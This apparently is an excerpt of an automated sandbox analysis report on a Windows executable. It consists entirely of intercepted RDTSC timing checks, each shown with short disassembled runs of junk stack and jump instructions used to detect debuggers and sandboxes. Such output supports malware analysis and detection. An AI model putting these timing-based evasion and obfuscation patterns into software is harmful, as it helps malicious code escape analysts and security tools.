                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1312634 second address: 1312638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1312638 second address: 131263E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13159EA second address: 1315A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B309h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1548D0B301h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1315A1E second address: 1315A24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131BBD4 second address: 131BC0D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F1548D0B301h 0x00000012 jmp 00007F1548D0B301h 0x00000017 popad 0x00000018 jns 00007F1548D0B300h 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A7A2 second address: 131A7B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Ch 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A7B4 second address: 131A7DA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1548D0B310h 0x00000008 js 00007F1548D0B2F6h 0x0000000e jmp 00007F1548D0B304h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A7DA second address: 131A7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F15490E9B8Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e ja 00007F15490E9B8Eh 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A7FC second address: 131A827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007F1548D0B2FCh 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edi 0x0000000d jmp 00007F1548D0B2FAh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1548D0B2FBh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131AECD second address: 131AEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F15490E9B8Eh 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007F15490E9B86h 0x00000013 pop ebx 0x00000014 popad 0x00000015 push edi 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131B4A1 second address: 131B4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131B4A8 second address: 131B4B2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F15490E9B92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131B4B2 second address: 131B4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131BA56 second address: 131BA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131BA5A second address: 131BA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A2A4 second address: 131A2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F15490E9B94h 0x0000000f jnc 00007F15490E9B86h 0x00000015 popad 0x00000016 push ebx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F15490E9B8Ch 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A2DB second address: 131A2DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324E49 second address: 1324E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324E4F second address: 1324E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jne 00007F1548D0B2FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325C27 second address: 1325C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1326069 second address: 132607C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1548D0B2FDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132607C second address: 1326081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129E439 second address: 129E43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129E43F second address: 129E47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15490E9B8Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push edx 0x00000014 pop edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop edi 0x00000018 jne 00007F15490E9B9Dh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13282F8 second address: 132831C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1548D0B308h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132831C second address: 1328322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13284AE second address: 13284B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129FF9B second address: 129FFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F15490E9B91h 0x0000000b popad 0x0000000c jmp 00007F15490E9B95h 0x00000011 jmp 00007F15490E9B8Fh 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jmp 00007F15490E9B90h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132B379 second address: 132B37D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132B37D second address: 132B388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E0E8 second address: 132E0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E0EE second address: 132E0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E252 second address: 132E28C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1548D0B309h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F1548D0B301h 0x00000013 jno 00007F1548D0B2FEh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F1548D0B2FAh 0x00000022 pushad 0x00000023 popad 0x00000024 push edx 0x00000025 pop edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E3E3 second address: 132E428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F15490E9B86h 0x0000000a pop eax 0x0000000b jmp 00007F15490E9B8Ah 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 jmp 00007F15490E9B92h 0x00000018 pop eax 0x00000019 jmp 00007F15490E9B97h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E428 second address: 132E42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E42E second address: 132E434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E434 second address: 132E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F1548D0B2F6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335809 second address: 133580D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133580D second address: 1335824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335824 second address: 133582C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334413 second address: 1334417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334417 second address: 133441F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133441F second address: 133442B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F1548D0B2F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133442B second address: 1334431 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334565 second address: 1334574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1548D0B2F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334574 second address: 1334580 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334580 second address: 1334584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6B9E second address: 12E6BA8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6BA8 second address: 12E6C3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B306h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D3031h], ecx 0x00000010 mov ebx, dword ptr [ebp+12497B2Ch] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F1548D0B2F8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 movsx edi, si 0x00000033 add eax, ebx 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F1548D0B2F8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f pushad 0x00000050 jmp 00007F1548D0B307h 0x00000055 mov edi, dword ptr [ebp+122D2A9Dh] 0x0000005b popad 0x0000005c push ecx 0x0000005d clc 0x0000005e pop edx 0x0000005f push eax 0x00000060 pushad 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133499C second address: 13349A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13349A0 second address: 13349D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1548D0B303h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F1548D0B31Ch 0x00000011 jp 00007F1548D0B302h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13349D5 second address: 13349D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339ACB second address: 1339ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F1548D0B2F6h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338DD0 second address: 1338DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338DD4 second address: 1338DF7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F1548D0B2F6h 0x00000011 jo 00007F1548D0B2F6h 0x00000017 jmp 00007F1548D0B2FBh 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338F55 second address: 1338F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F15490E9B86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13390A0 second address: 13390A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13390A4 second address: 13390A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13390A8 second address: 13390AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339203 second address: 133920D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C68F second address: 133C6A1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1548D0B2F8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push ebx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CA66 second address: 133CA6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CA6F second address: 133CAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1548D0B303h 0x00000009 jmp 00007F1548D0B2FCh 0x0000000e popad 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 push ecx 0x00000016 js 00007F1548D0B2F6h 0x0000001c jg 00007F1548D0B2F6h 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CAAD second address: 133CAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CAB1 second address: 133CACB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1548D0B301h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CACB second address: 133CAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F15490E9B86h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F15490E9B96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134382F second address: 1343837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1343837 second address: 1343841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F15490E9B86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134399E second address: 13439B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jne 00007F1548D0B2F6h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344172 second address: 1344176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344176 second address: 1344180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344180 second address: 1344190 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 ja 00007F15490E9B94h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344190 second address: 1344196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13449D5 second address: 13449DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344C83 second address: 1344C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1548D0B2F6h 0x0000000a popad 0x0000000b jnp 00007F1548D0B2FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344C96 second address: 1344C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344C9A second address: 1344CA6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344CA6 second address: 1344CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349BB7 second address: 1349BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349BBB second address: 1349BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349BC1 second address: 1349BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1548D0B303h 0x0000000b jnc 00007F1548D0B2FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349D02 second address: 1349D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349D0C second address: 1349D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349E86 second address: 1349EA0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007F15490E9B86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349EA0 second address: 1349EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F1548D0B2FBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349EB3 second address: 1349ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F15490E9B99h 0x0000000c jp 00007F15490E9B86h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349ED9 second address: 1349EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13560DD second address: 13560E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13560E1 second address: 13560E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13560E7 second address: 135612B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F15490E9BB5h 0x0000000f push ebx 0x00000010 jmp 00007F15490E9B93h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 jmp 00007F15490E9B90h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13563E0 second address: 13563E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
